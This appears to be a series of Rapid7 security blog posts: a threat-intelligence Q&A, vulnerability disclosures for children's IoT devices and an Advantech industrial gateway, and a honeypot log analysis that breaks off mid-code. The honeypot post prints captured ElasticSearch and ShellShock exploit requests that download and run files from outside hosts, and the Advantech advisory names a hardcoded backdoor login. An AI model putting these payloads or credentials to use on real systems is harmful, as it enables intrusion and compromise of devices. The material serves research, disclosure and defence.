
Thanks to everyone who joined our webinar on How to Build Threat Intelligence into your Incident Detection and Response Program. We got so many great questions during the session that we decided to follow up with a post answering them and addressing the trends and themes we continue to see around threat intelligence.

TL;DR for those of you who don't have time to read all of the responses (we got a lot of questions):

  • Threat intelligence is a process, not something you buy. That means you will have to put in work to get results.
  • Threat intelligence works best when it is integrated across your security operations and is not viewed as a stand-alone function.
  • Strategic, Operational, and Tactical threat intelligence (including technical indicators) are used differently and gathered using different methods.

Do you see threat intelligence as a proactive approach to cyber monitoring or just a better way of responding to cyber threats? If you see it as proactive, how, since the intelligence is based on events and TTPs that have already occurred?

 

A misconception about threat intelligence is that it is focused exclusively on alerting or monitoring. We talked about indicators of compromise and how to use them for detection and response, but there is a lot more to threat intelligence than IOCs. 

 

When threat intelligence is properly implemented in a security program it contributes to prevention, detection, and response. Understanding the high level, strategic threats facing your organization helps determine how to improve overall security posture.

 

All intelligence must be based on facts (i.e., things that have already occurred or that we already know), but those facts allow us to create models that can be used to identify trends and assess what controls should be put in place to prevent attacks.

 

As prevention comes into alignment, it is important to maintain awareness of new threats by leveraging operational and tactical intelligence, taking action to protect your organization before those threats are able to impact you.

 

I can see the usefulness of tactical, operational and technical intelligence. How would you be able to establish strategic intelligence?

 

Strategic Intelligence is intelligence that informs leadership or decision makers on the overarching threats to the organization or business. Think of this as informing high-level decision making based on evidence, seeing the forest without being distracted by the trees.

 

Information that contributes to strategic intelligence is gathered and analyzed over a longer period of time than other types of threat intelligence. The key to utilizing strategic intelligence is being able to apply it in the context of your own data and attack surface. An example would be intelligence that financially motivated cyber criminals are targeting third party vendors in order to gain access to retail networks. This information could be used to assess whether a business would be vulnerable to this type of attack and identify longer term changes that need to take place to reduce the risk, such as network segmentation, audits of existing third-party access, and development of policies to limit access.

 

What is the difference between Strategic and Operational Intelligence?

 

Strategic intelligence focuses on long term threats and their implications while operational intelligence focuses on short term threats that may need to be mitigated immediately. Implementing strategic and operational intelligence often involves asking the same questions: who and why. With strategic intelligence you are evaluating the attackers - focusing on their tactics and motivations rather than geographical location - to determine how those threats may impact you in the future. With operational intelligence you are evaluating who is actually being targeted and how, so that you can determine if you need to take any immediate actions in response to the threat.



What is positive control and why is it important?

Positive control is the aspirational state of a technical security program. This means that only authorized users and systems are on the network, and that accounts and information are accessed only by approved users. Before you start assessing your network to understand what “normal” looks like, take care to be sure that you are not including attacker activity in your baseline.

 

 

If you are being targeted by an identified entity, what should you do to build intelligence on possible attacks?

Active and overt attacks fall into the realm of operational intelligence. You can gather intelligence on these attacks from social media, blog posts, or alerts from places like US-CERT, ISACs, ISAOs, and other sharing groups. Some questions you should be asking and answering as you gather information are:

  • Who else is being targeted? Can we share information with them on this attack?
  • How have the attackers operated in the past?
  • What are we seeing now that can help us protect ourselves?

 

What is done in Tactical Monitoring?

Tactical Intelligence tends to focus on mechanisms - the “how” of what an attacker does. Do they tend to use a particular method to gain initial access? A particular tool or set of tools to escalate privilege and move laterally? What social engineering or reconnaissance activities do they typically engage in prior to an attack? Tactical intelligence is geared towards security personnel who are actively monitoring their environment as well as fielding reports from employees about strange activities or social engineering attempts. Tactical Intelligence can also be used by hunters seeking to identify behavior that may look like normal user activity but is also used by attackers to avoid detection. This type of intelligence requires more advanced resources, such as extensive logging, behavioral analytics, endpoint visibility, and trained analysts. It also requires a security-conscious workforce, as some indicators may not be captured or flagged by logs without first being reported by an employee.

 

Can you point me to resources where to gather information regarding strategic, tactical and operational intelligence?

Before you start gathering information it is important to have a solid understanding of the different levels of threat intelligence. CPNI released a whitepaper covering four types of threat intelligence that we discussed on the webinar: https://www.cpni.gov.uk/Documents/Publications/2015/23-March-2015-MWR_Threat_Intelligence_whitepaper-2015.pdf

 

- Or - if you are an intelligence purist and find that four types of threat intelligence is one type too many (or if you’re just feeling rambunctious), you can refer to JP 2-0, Joint Intelligence, for an in-depth understanding of the levels of intelligence and their traditional application. http://www.dtic.mil/doctrine/new_pubs/jp2_0.pdf

 

Once you are ready, here are some places to look for specific types of intelligence:

 

Strategic Intelligence can be gathered through open source trend reports such as the DBIR, DBIR industry snapshots, or other industry specific reports that are frequently released.

 

Operational Intelligence is often time sensitive and can be gathered by monitoring social media, government alerts like those from US-CERT, or by coordinating with partners in your industry.

 

Tactical Intelligence can be gathered using commercial or open sources, such as blogs, threat feeds, or analytic white papers. Tactical Intelligence should tell you how an actor operates, the tools and techniques that they use, and give you an idea of what activities you can monitor for on your own network. At this level, understanding your users and how they normally behave is critical, because threat actors will try to mimic those same behaviors, and being able to identify a deviation, no matter how small, can be extremely significant.

 

What is open source threat intelligence?

Open Source intelligence (OSINT) is the product of gathering and analyzing data from publicly available sources: the open internet, social media, traditional media, etc.

More here: https://en.wikipedia.org/wiki/Open-source_intelligence

For more information on the other types of intelligence collection disciplines: https://www.fbi.gov/about-us/intelligence/disciplines

 

Open source threat intelligence is OSINT that focuses specifically on threats. In many cases you will be able to gather OSINT but will still have to do the analysis of the potential impact of the threat on your organization.

 

What are ISACs and ISAOs? Where can I find a list of them?

Most private sector information sharing is conducted through Information Sharing and Analysis Centers (ISACs), organized primarily by sector (usually critical infrastructure). A list is located here: http://www.isaccouncil.org/memberisacs.html

 

In the United States, under President Obama’s Executive Order 13691, DHS was directed to improve information sharing between the US government’s National Cybersecurity and Communications Integration Center (NCCIC) and the private sector. This executive order serves as the platform for Information Sharing and Analysis Organizations (ISAOs), which include those outside the traditional critical infrastructure sectors.

 

What specific tools are used for threat intelligence?

This is a great question, and I think it underscores a big misunderstanding out there. Threat Intelligence is a process, not a product you buy or a service you retain. Any tool you use should help augment your processes. There are a few broad classifications of tools out there, including threat intelligence platforms and data analytics tools. The best way to find the right tools is to identify what problem you are trying to solve with threat intelligence, develop a manual process that works for you, and then look for tools that will help make that manual process easier or more efficient.

 

Can a solution or framework be tailored to support organizations at different levels of cyber security maturity and awareness, or is there a minimum requirement?

There *is* a certain level of awareness that is required to implement a threat intelligence program. Notice that we didn’t say maturity - we feel that a program at any maturity level can benefit from threat intelligence, but there is a lot that goes into an organization being ready to utilize it.

 

At the very basic level an organization needs to understand what threat intelligence is and what it isn’t, understand the problems that they are trying to solve with threat intel, and have a person or a team who is responsible for threat intel. An organization with this base level of understanding is far ahead of many others.

 

When discussing the more technical implementations of threat intelligence, such as threat feeds or platforms, there are some barriers to entry. Aside from those situations, nearly any organization can work to better understand the threats facing them and how they should start to posture themselves to prevent or respond to those threats. If you understand how threat intelligence works and start to implement it appropriately, you will be better off regardless of what else you are dealing with.

 

How do you stop an attacker once discovered? ACLs, IPS, etc.?

Scoping the attack is the first stage, which requires both investigation and forensics. The investigation team will identify various attributes used in the attack (tools, tactics, procedures), and then will go back and explore the rest of your systems for those attributes.

 

As systems get added, the recursive scoping loop continues until no new systems are added.
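
Conceptually, that scoping loop is a simple worklist over systems. Here is a minimal sketch, where find_systems_matching is a hypothetical stand-in for your investigation tooling (searching logs, endpoint data, and forensic images for the attributes identified so far):

  def scope_incident(initial_systems, find_systems_matching):
      # Expand the set of in-scope systems until a full sweep adds nothing new.
      # find_systems_matching(system) is a hypothetical hook that returns other
      # systems exhibiting the attributes (tools, tactics, procedures) observed
      # on the given system.
      in_scope = set(initial_systems)
      queue = list(initial_systems)
      while queue:
          system = queue.pop()
          for candidate in find_systems_matching(system):
              if candidate not in in_scope:
                  in_scope.add(candidate)
                  queue.append(candidate)
      return in_scope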

 

Once scoping is done, there are a number of actions to be taken - and the complexity involved in deciding exactly what happens (and when) grows exponentially. A short (and anything but comprehensive) list of considerations includes:

  • Executive briefing and action plan signoff
  • Estimate the business impact of the recovery actions to be executed
  • Isolate compromised systems
  • Lock or change passwords on all compromised accounts with key material in the scoped systems
  • Patch and harden all systems in the organization against vulnerability classes used by the attacker
  • Identify exactly what data was impacted, consult with legal regarding regulatory or contractual required next steps
  • Safely and securely restore impacted services to the business

 

Obviously there are a lot of variables at play here, and every incident is unique.

This stuff is extremely hard; if it were easy, everyone would be doing it.

Call us if you need help.

 

When I find a system that has been compromised, can you tell me where it came from?

You’re asking the right question here - getting a sense of the attacker’s motivation and tactics is extremely valuable. Answering “who did this” and “where did they come from” is a lot more difficult than simply pointing at the source IP for the initial point of entry or command and control.

 

Tactical Intelligence from the investigation will help answer these questions.

 

What should be the first step after learning that a host has been compromised by a zero-day attack?

Run around, scream and shout.

In all seriousness, you won’t start off knowing that a zero-day was used to compromise the asset. Discovering that 0day was used in a compromise, by definition, means that an investigation was performed and the root cause identified at the point of infection was, in fact, 0day. At that point you will hopefully have gathered more information about the incident that you can then analyze to better understand the situation you are facing.

I've joined Rapid7!

Posted by Harley Geiger, Feb 10, 2016

Hello! My name is Harley Geiger and I joined Rapid7 as director of public policy, based out of our Washington, DC-area office. I actually joined a little more than a month ago, but there's been a lot going on! I'm excited to be a part of a team dedicated to making our interconnected world a safer place.

 

Rapid7 has demonstrated a commitment to helping promote legal protections for the security research community. I am a lawyer, not a technologist, and part of the value I hope to add is as a representative of security researchers' interests before government and lawmaking bodies – to help craft policies that recognize the vital role researchers play in strengthening digital products and services, and to help prevent reflexive anti-hacking regulations. I will also work to educate the public and other security researchers about the impact laws and legislation may have on cybersecurity.

 

Security researchers are on the front lines of dangerous ambiguities in the law. Discovering and patching security vulnerabilities is a highly valuable service – vulnerabilities can put property, safety, and dignity at risk. Yet finding software vulnerabilities often means using the software in ways the original coders do not expect or authorize, which can create legal issues. Unfortunately, many computer crime laws - like the Computer Fraud and Abuse Act (CFAA) - were enacted decades ago and make little distinction between beneficial security research and malicious hacking. And, due to the steady stream of breaches, there is constant pressure on policymakers to expand these laws even further.

 

I believe the issues currently facing security researchers also have broader societal implications that will grow in importance. Modern life is teeming with computers, but the future will be even more digitized. The laws governing our interactions with computers and software will increasingly control our interactions with everyday objects – including those we supposedly own – potentially chilling cybersecurity research, repair, and innovation when these activities should be broadly encouraged. We, collectively, will need greater freedom to oversee, modify, and secure the code around us than the law presently affords.

 

That is a major reason why the opportunity to lead Rapid7's public policy activities held a lot of appeal for me. I strongly support Rapid7's mission of making digital products and services safer for all users. In addition, it helped that I got to know Rapid7's leadership team years before joining. I first met Corey Thomas, Lee Weiner, and Jen Ellis while working on "Aaron's Law" for Rep. Zoe Lofgren in the US House of Representatives. After working for Rep. Lofgren, I was Senior Counsel and Advocacy Director at the Center for Democracy & Technology (CDT), where I again collaborated with Rapid7 on cybersecurity legislation. I've been consistently impressed by the team's overall effectiveness and dedication.

 

Now that I'm part of the team, I look forward to working with all of you to modernize how the law approaches security research and cybersecurity. Please let me know if you have ideas for collaboration or opportunities to spread our message. Thank you!

 

Harley Geiger

Director of Public Policy

Rapid7

@HarleyGeiger

I’ve never been one for New Year’s resolutions. I’ve seen how they tend to exist only for short-term motivation rather than long-term achievement. Resolutions are just not specific enough and there’s no tangible means for accomplishing anything of real value. Just check out your local gym by mid-February. It’s all cleared out. The people who energetically vowed to make changes late last year have simply lost their resolve.

 

But it’s not just a personal thing. The cycle of resolve-try-forget exists in our professional lives as well. If you manage an information security program or somehow have your hands in the IT risk equation, you have to be careful not to get on that diet-like roller coaster. You need a plan. You need specific steps to take. You have to hold yourself accountable. The very moment you say something high-level that you want to accomplish with your information security program – with no specific details or deadlines – is the very moment you hop on the road of good intentions. We all know where that leads.

 

For example, let’s say you resolve to do the following for your security program this year:

  • Do more security assessments
  • Follow-up on security assessment results sooner
  • Perform additional security monitoring
  • Send more security awareness emails to users
  • Not get hacked
  • Talk to management about what’s happening on the network

 

You write these down on a whiteboard in your conference room so everyone can see them. With your staff being exposed to these resolutions during your weekly team meetings, they’ll keep them top of mind and things will take care of themselves, right? Absolutely not! Just ask the guy who vowed to eat less and exercise more. He’s not at the gym, so you’ve got a better chance of tracking him down.

 

Take a look at each of the above resolutions. Notice anything missing? They’re not specific. There are no documented steps that need to be taken to accomplish them. There are no deadlines. They’re mere wishes. Dreams at best. If you want to start accomplishing things in information security, you have to get serious and document actual goals. You then have to “manage” your goals, which means you revisit them on a periodic and consistent basis (i.e., daily) and take steps every week to make each goal become reality. Goals are not all that different from security metrics that you might have. They’re specific and tangible. They’re also reasonable and attainable.

 

I’m convinced that if we were to look at the root causes of all the publicly known breaches, we’d certainly see politics, ignorance, and downright bad luck behind them. But odds are excellent that we’d also see that the people in charge had no goals for managing information security or were, at least, mismanaging them.

 

Take a look at your security program and determine what you want to accomplish this year. It’ll be obvious but it won’t be easy. It’s up to you to make things happen. It takes more than resolve. It takes the proper philosophy and, most importantly, discipline.

Through our recent publication of numerous security issues in Internet-connected baby monitors, we were able to comprehensively raise awareness of the real-world risks facing those devices. Further, we were able to work with a number of vendors to get key security problems resolved, resulting in major improvements in security within that particular market space. Today, Rapid7 is continuing this effort of applying security research to the Internet of Things (IoT) with the release of information on two new security research projects that have also improved the safety and privacy of families.

 

With this most recent research, we have once again been able to work with vendors to resolve serious security issues impacting their platforms, and we hope that vendors of related products take note of these findings so that the overall market can improve beyond just these particular instances. We also hope that consumers are able to use these issues as examples of the potential risks of bringing IoT products into their own families. Per our usual disclosure policy, the relevant vendors were notified, and CERT proved instrumental in connecting us with the vendors in question.

 

Fisher-Price Smart Toy®


The Fisher-Price Smart Toy® is an innovative line of digital "stuffed animals" that provide both educational and entertainment options for children ranging in ages from 3-8 years old. While the device is able to function without Internet-connected capabilities, its functionality is enhanced over Wi-Fi through a companion mobile application for parents and updates to device activities. Plus, let's face it, a "smart" toy doesn't really get very smart without some real-time Internet connectivity!

 

The issues for the Fisher-Price Smart Toy® were disclosed to CERT under vulnerability note VU#745448.

 

Vulnerability R7-2015-27: Improper Authentication Handling (CVE-2015-8269)

Through analysis of the Fisher-Price Smart Toy® at the hardware, software, and network levels, it was determined that many of the platform's web service (API) calls were not appropriately verifying the "sender" of messages, allowing a would-be attacker to send requests that shouldn't be authorized under ideal operating conditions. The following is a list of APIs that were found to be at risk due to this lack of proper authorization, along with the associated impacts.

 

  • Find all customers (sequential integer), which provides a list of those customers' toy details (toy ID, toy name, toy type, and associated child profile)
  • Find all children's profiles, which provides their name, birthdate, gender, language, and which toys they have played with
  • Create, edit, or delete children's profiles on any customer's account, which will be displayed within a parent's mobile application
  • Alter what toys a customer's account has (e.g. delete toys, add someone else's toy to a different account), effectively allowing an attacker to 'hijack' the device's built-in functionality
  • Find the status of whether a parent is actively using their associated mobile application or if a child is interacting with their toy
  • Read access to miscellaneous data, such as what game packs are attached to a profile, what purchases were made by a customer, and scores for games
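
For illustration only, here is a minimal sketch of the kind of server-side ownership check whose absence makes calls like these exploitable. This is a generic pattern with hypothetical lookup helpers (db.customer_for_session, db.child_profile), not the vendor's actual code:

  class AuthorizationError(Exception):
      pass

  def get_child_profile(session_token, child_id, db):
      # Derive the customer from the authenticated session, never from a
      # client-supplied customer ID (the db.* helpers are hypothetical).
      customer = db.customer_for_session(session_token)
      if customer is None:
          raise AuthorizationError("not authenticated")
      profile = db.child_profile(child_id)
      # Verify ownership before returning data, rather than trusting whatever
      # IDs happen to be in the request.
      if profile is None or profile.owner_id != customer.id:
          raise AuthorizationError("profile does not belong to this customer")
      return profile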

 

Impact

Most clearly, the ability for an unauthorized person to gain even basic details about a child (e.g. their name, date of birth, gender, spoken language) is something most parents would be concerned about. While names and birthdates in particular are nominally non-secret pieces of data, they could be combined later with a more complete profile of the child in order to facilitate any number of social engineering or other malicious campaigns against either the child or the child's caregivers.

 

Additionally, because a remote user could hijack the device's functionality and manipulate account data, they could effectively force the toy to perform actions that the child user didn't intend, interfering with normal operation of the device.

 

Disclosure Timeline for R7-2015-27

Fri, Nov 13, 2015: Initial research and discovery by Mark Stanislav of Rapid7, Inc.

Mon, Nov 23, 2015: Initial contact to the vendor.

Tue, Dec 08, 2015: Details disclosed to CERT as VU#745448.

Thu, Jan 07, 2016: Disclosure details acknowledged by the vendor.

Tue, Jan 19, 2016: Issues addressed as reported by the vendor.

Tue, Feb 02, 2016: Public disclosure of R7-2015-27.

 


hereO GPS Platform

The hereO GPS Platform provides family members a connected and integrated means to easily keep track of the location and activity of each other through the use of both a multi-platform mobile application and a cellular-enabled watch that is targeted at use by children ranging in ages from 3-12 years old. Much like a traditional social network, family members can be invited into a group and then have varying levels of access to each other, determined by administrative users. Additional features of this platform include intra-family communication (i.e. messaging), notifications for people coming and/or going from a specific location (i.e. geo fences), and even a panic-alert function.

 

The issues for the hereO GPS Platform were disclosed to CERT under vulnerability note VU#213384.

 

Vulnerability R7-2015-24: Authorization Bypass

Through analysis of the hereO GPS Platform at the software and network levels, it was determined that an authorization flaw existed within the platform's web service (API) calls: requests related to account invitations to a family's group were not adequately protected against manipulation. Through the use of a pawn account that the attacker controls, they are able to send a request for authorization into the family's group they are targeting and then, by abusing an API vulnerability, have that pawn account accept the request on the targeted family's behalf. The following diagram shows the attacker's effective workflow used to conduct this attack.

 

[Diagram: attacker workflow for the hereO group-invitation authorization bypass]

Impact

By abusing this vulnerability, an attacker could add their account to any family's group with minimal notification that anything has gone wrong. The notifications that are generated could also be manipulated through clever social engineering, for instance by setting the attacker's "real name" to a message such as 'This is only a test, please ignore.'

 

Once this exploit has been carried out, the attacker would have access to every family member's location and location history, and would be able to abuse other platform features as desired. Because the security issue applies to controlling who is allowed to be a family member, the rest of this functionality performs as intended and is not itself any form of vulnerability.

 

Disclosure Timeline for R7-2015-24

Sat, Oct 24, 2015: Issue discovered by Mark Stanislav of Rapid7, Inc.

Thu, Oct 29, 2015: Internal review by Rapid7, Inc.

Mon, Nov 02, 2015: Initial vendor contact.

Mon, Nov 23, 2015: Details disclosed to CERT, VU#213384 assigned.

Tue, Dec 15, 2015: Details disclosed to the vendor.

Tue, Dec 15, 2015: Issue resolved as reported by the vendor.

Tue, Feb 02, 2016: Public disclosure of R7-2015-24.

 

Conclusions

This research helps to further underline the nascency of the Internet of Things with regard to information security. While many clever and useful ideas are constantly being innovated for market segments that may never have existed before, this agility in getting products into consumers' hands must be delicately weighed against the potential risks of the technology's use.

 

Still, it's important to be mindful that all technologies contain bugs that can impact the security of the ecosystem powering a sometimes complex mixture of protocols, standards, and components. While the issues explained here were detrimental to their users' privacy and safety, they were also the kinds of issues that we've seen so many organizations make.

 

For this reason, it's critical that vendors creating the next generation of IoT products & platforms leverage industry initiatives, such as BuildItSecure.ly and OTA's IoT Trust Framework, to better the security of these technologies before they enter consumers' hands and homes.

 

If you're curious about some of the techniques to approach research such as this, please take a look at a previously published primer on IoT hacking that discusses some of the approaches and technologies used to conduct this research.

While looking into the SSH key issue outlined in the ICS-CERT ICSA-15-309-01 advisory, it became clear that the Dropbear SSH daemon did not enforce authentication, and a possible backdoor account was discovered in the product. All results are from analyzing and running firmware version 1322_D1.98, which was released in response to the ICS-CERT advisory.

This issue was discovered and disclosed as part of research resulting in Rapid7's disclosure of R7-2015-25, involving a number of known vulnerabilities present in the Advantech firmware. Given that CVE-2015-7938 represents a new vulnerability, however, it was held back until January 2016.

 

Product Description

The Advantech EKI series products are Modbus gateways used to connect serial devices to TCP/IP networks. They are typically found in industrial control environments. The firmware analyzed is specific to the EKI-1322 GPRS (General Packet Radio Service) IP gateway device, but given the scope of ICSA-15-309-01, it is presumed these issues are present on other EKI products.

 

Credit

This issue was discovered by HD Moore of Rapid7, Inc.

 

Details

As of the 1.98 version of the firmware, the Dropbear daemon included had been heavily modified. As a result, it does not actually enforce authentication: during testing, any user was able to bypass authentication by using any public key and password.

 

In addition, there may be a backdoor hardcoded into this version of the binary as well, using the username and password of "remote_debug_please:remote_debug_please", as shown in the partial firmware analysis below:

 

.text:000294F8                 ADD     R0, R0, #0x2C   ; haystack
.text:000294FC                 LDR     R1, =aRemote_debug_p ; "remote_debug_please"
.text:00029500                 LDR     R3, =strstr

 

Note that it is unconfirmed if this backdoor account is reachable on a production device by an otherwise unauthenticated attacker; its presence was merely noted during binary analysis, and the vendor has not acknowledged the purpose or existence of this account.
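
If you have extracted the firmware and want to check a binary for the same hardcoded string, a quick byte search is enough; a minimal sketch, with a hypothetical local path:

  path = "extracted/dropbear"  # hypothetical location of the extracted binary

  with open(path, "rb") as f:
      data = f.read()

  if b"remote_debug_please" in data:
      print("hardcoded 'remote_debug_please' string is present")
  else:
      print("string not found")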

 

Mitigations

The authentication bypass issue is resolved in EKI-1322_D2.00_FW, available from the vendor's website as of December 30, 2015. Customers are urged to install this firmware at their earliest opportunity.

In the event that firmware cannot be installed, users of these devices should ensure that sufficient network segmentation is in place, and only trusted users and devices are able to communicate to the EKI-123* device.

 

Disclosure Timeline

This issue was disclosed via Rapid7's usual disclosure policy.

 

  • Wed, Nov 11, 2015: Initial contact to vendor
  • Tue, Dec 01, 2015: R7-2015-25.4 disclosed to CERT
  • Tue, Dec 01, 2015: VU#352776 assigned by CERT
  • Wed, Dec 09, 2015: Receipt of VU#352776 confirmed by ICS-CERT
  • Wed, Dec 30, 2015: EKI-1322_D2.00_FW released by the vendor
  • Tue, Jan 05, 2016: Bulletin ICSA-15-344-01 updated by ICS-CERT
  • Fri, Jan 15, 2016: R7-2015-26 publicly disclosed by Rapid7

In order to learn more about the strategic initiatives, current tools used, and challenges security teams are facing today, we surveyed 271 security professionals hailing from organizations across the globe. We were able to get fantastic responses representing companies from all sizes and industries, including healthcare, finance, retail, and government.

 


 

On January 21st, we will be hosting a webcast with full analysis of the results. Register now and get the full report today. As a teaser, here are two key findings:

 

     1. 90% of organizations are worried about compromised credentials, though 60% say they cannot catch these types of attacks today.


 

     2. 62% of organizations are receiving more alerts than they can feasibly investigate.

 


 

For more, including:

  • Major sources of pain in their Incident Response Program
  • SIEMs: Who has one, and how are they using it?
  • Cloud: Most popular services, organizational policy, and security visibility

 

Download the full report here. To learn more about Rapid7’s Incident Detection and Response offerings, visit our solutions page, or join us for a free Guided Demo!

One of the greatest challenges in security is getting the right information so that educated decisions can be made. It happens across many facets of security such as network monitoring, incident response, and user training. However, there’s one (big) exception: security assessments. Assuming you’re using the proper tools and reasonable methodologies to uncover your network security weaknesses, you have everything you need at your disposal. You have the vulnerabilities, the attack vectors, the systems affected, and even what’s required to resolve the issues.

 

Yet, still, time after time we hear of vulnerabilities that go unresolved. It’s discouraging to me, as a consultant, to see this. You know, the vulnerabilities that were in last quarter’s – or last year’s – assessment that are showing up today. I see this issue all the time. Unless management is willing to defend why known vulnerabilities remain unresolved, you have to have a plan of action after each assessment. Second only to actually mitigating the flaws, developing a specific plan should be a top priority.

 

Everyone’s approach and needs are unique, but there are certain aspects to getting things done that apply across the board including:

 

  • What has been uncovered?
  • How does each finding affect the business?
  • Where do we truly need to focus our efforts? (tip: it should be on the most urgent flaws on your most important systems)
  • Are there certain findings that we can take off the table completely?
  • Who can resolve each issue in the short term?
  • Who – or what – else needs to be involved to help prevent this issue from reoccurring?

 

Once you have this information, ask yourself: What’s next? What’s after that? And, what do we need to do now? Keep repeating this over and over until you get done what needs to be done.

 

Well-respected business executive Jack Welch of GE once said, "An organization's ability to learn, and translate that learning into action rapidly, is the ultimate competitive business advantage." You can’t un-acknowledge security vulnerabilities. They’re there. They’ve called attention to themselves. You know what needs to be done.

 

Don’t try to solve the security issues you uncover at a mere technical level, on your own. Go up a few steps and look at security management, business operations, and related issues that are the root causes. Then vow to do what it takes to make changes. Many people will try to wish such security issues away. Others will find every excuse in the book as to why it’s not possible to fix them. Don’t take those paths. We’ve seen where they end up. Let discipline and common sense lead the way instead.

This post is the 12th in the series, "12 Days of HaXmas."

 

So the Christmas season is here, and between ordering gifts and drinking Glühwein, what better way to spend your time than to sift through some honeypot / firewall / IDS logs and try to make sense of them, right?

 

At Rapid7 Labs, we're not only scanning the internet, but also looking at who out there is scanning, by making use of honeypot and darknet tools. More precisely, we're running a couple of honeypots spread around the world and collecting raw traffic PCAP files with something similar to tcpdump (just slightly more clever).

 

This post is just a quick log of me playing around with some of the honeypot logs. Most of what I'm doing here is happening in one of our backend systems as well, but I figured it might be cool to explain this by doing it manually.

 

Some background

The honeypot is fairly simple: it waits for incoming connections and then tries to figure out what to do with them. It might need to treat a connection as an SSL/TLS session, or just a plain HTTP request. Depending on the incoming protocol, it will try to answer in a meaningful way. Even with some very basic honeypot that just opens a port and waits for requests, you will quickly find things like this:

 

GET /_search?source={"query":+{"filtered":+{"query":+{"match_all":+{}}}},+"script_fields":+{"exp":+{"script":+"import+java.util.*;import+java.io.*;String+str+=+\"\";BufferedReader+br+=+new+BufferedReader(new+InputStreamReader(Runtime.getRuntime().exec(\"wget+-O+/tmp/zldyls+http://61.176.223.109:1111/zldyls\").getInputStream()));StringBuilder+sb+=+new+StringBuilder();while((str=br.readLine())!=null){sb.append(str);sb.append(\"\r\n\");}sb.toString();"}},+"size":+1} HTTP/1.1
Host: redacted:9200
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.4.1 CPython/2.7.8 Windows/2003Server

or this:

GET HTTP/1.1 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("cd /tmp;cd /var/tmp;rm -rf .c.txt;rm -rf .d.txt ; wget http://109.228.25.87/.c.txt ; curl -O http://109.228.25.87/.c.txt ; fetch http://109.228.25.87/.c.txt ; lwp-download http://109.228.25.87/.c.txt; chmod +x .c.txt* ; sh .c.txt* ");'
Host: redacted
Connection: Close

What we're looking at are ElasticSearch (slightly modified, as the path was URL-decoded for better readability) and ShellShock exploit attempts. One can quickly see that the technique is fairly straightforward - there's a specific exploit that allows you to run commands. In these cases, the attackers are just running some straightforward shell commands in order to download a file (by any means necessary) and execute it. You can find several writeups around these exploitation attempts and the botnets behind them on the web (e.g. [1], [2], [3]).

 

Now, because of this common pattern, our honeypot does some basic pattern matching and extracts any URL or command that it finds in the request. If there's a URL (inside a wget/curl/etc. command), it will then try to download that file. We could also do this at the post-processing stage, but by then the URL might not be available anymore, as these things tend to disappear or get taken down quickly.
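
As a simplified sketch of that extraction step (not the honeypot's actual code), you could pull candidate drop URLs out of the request with a loose regular expression and fetch them immediately, since the drop sites rarely stay up for long:

  import re
  import requests  # third-party HTTP client, used here only to grab the payload

  # Loose pattern: any http(s) URL embedded in the request / shell command.
  URL_RE = re.compile(r"https?://[^\s;'\"]+")

  def extract_and_fetch(request_text):
      # Yield (url, payload_bytes) for every drop URL that is still reachable.
      for url in URL_RE.findall(request_text):
          try:
              resp = requests.get(url, timeout=10)
          except requests.RequestException:
              continue
          yield url, resp.content

  # Against the ShellShock command line shown above, the pattern finds:
  sample = "wget http://109.228.25.87/.c.txt ; curl -O http://109.228.25.87/.c.txt"
  print(URL_RE.findall(sample))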

 

Looking at the unique files from the last half year (roughly), we can count the following file types (reduced/combined for readability):

    178  ELF 32-bit LSB executable Intel 80386
     66  a /usr/bin/perl script ASCII text executable
     33  Bourne-Again shell script ASCII text executable
     14  POSIX tar archive (GNU)
     14  ELF 64-bit LSB executable x86-64
      4  ELF 32-bit LSB executable MIPS
      2  ELF 32-bit LSB executable ARM
      1  ELF 32-bit MSB executable PowerPC or cisco 4500
      1  ELF 32-bit MSB executable MIPS
      1  OpenSSH DSA public key
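
A tally like this can be produced by running the file utility over the downloaded samples; a rough sketch, assuming the unique files sit in a local directory (the path is hypothetical):

  import collections
  import os
  import subprocess

  sample_dir = "honeypot-samples/"  # hypothetical directory of unique downloads
  counts = collections.Counter()

  for name in os.listdir(sample_dir):
      path = os.path.join(sample_dir, name)
      # `file -b` prints only the description, e.g. "ELF 32-bit LSB executable ..."
      desc = subprocess.check_output(["file", "-b", path]).decode("utf-8", "replace")
      counts[desc.strip()] += 1

  for desc, count in counts.most_common():
      print("%7d  %s" % (count, desc))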

 

Typically the attacker is uploading a compiled malware binary. In some cases it's a shell script that will in turn download the next stage. And as we can see there's at least one case of an SSH public key that was uploaded - simple but effective. Also noteworthy is the targeting of quite a few different architectures. These are mostly binaries for embedded routers and, for example, the QNAP devices that are vulnerable to ShellShock.

 

Getting started on the logs

What kind of logs are we looking at? Mostly, our honeypot emits events like "there was a connection" or "i found a URL in a request" and "i downloaded a file from a URL". The first step is to grab a bunch of these events (a few thousand) and apply some geolocation to them (see DAP) (again, modified for better readability):

 

$ cat logs | dap json + geoip sensor + geoip source + remove some + rename some + json
{
  "ref": "conn-d7a38178-0520-49db-a79a-688f5ded5998",
  "utcts": "2015-12-13T07:36:59.444356Z",
  "sha1": "3eeb2eb0fdf9e4140277cbe4ce1149e57fae1fc9",
  "url": "http://ys-k.ys168.com/2.0/475535157/jRSKjUt4H535F3XKNTV/pycn.zuc",
  "url.netloc": "ys-k.ys168.com",
  "source": "117.175.110.177",
  "source.country_code": "CN",
  "sensor": "redacted",
  "sensor.country_code": "JP",
  "dport": 9200,
  "http.agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
  "http.method": "POST",
  "vulns": "VULN-ELASTICSEARCH-RCE,CVE-2014-3120,EXEC-SHELLCMD",
}
...

 

Now we can take these logs and do some correlation, creating one record per "attack". We also add a couple more data sources (ASN lookup, file types for the downloaded files, etc.).
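
A rough sketch of what that correlation step could look like, folding the per-event records shown above into one record per attacking source (the extra enrichment such as ASN lookups and file typing is left out):

  import collections

  def correlate(events):
      # Collapse raw honeypot events into one record per attacking source IP,
      # tracking first/last seen plus tallies of the interesting fields.
      attacks = {}
      for e in events:
          rec = attacks.setdefault(e["source"], {
              "source": e["source"],
              "count": 0,
              "first": e["utcts"],
              "last": e["utcts"],
              "urls": collections.Counter(),
              "sha1s": collections.Counter(),
              "sensor_countries": collections.Counter(),
              "dports": collections.Counter(),
              "vulns": collections.Counter(),
          })
          rec["count"] += 1
          rec["first"] = min(rec["first"], e["utcts"])
          rec["last"] = max(rec["last"], e["utcts"])
          rec["urls"][e.get("url")] += 1
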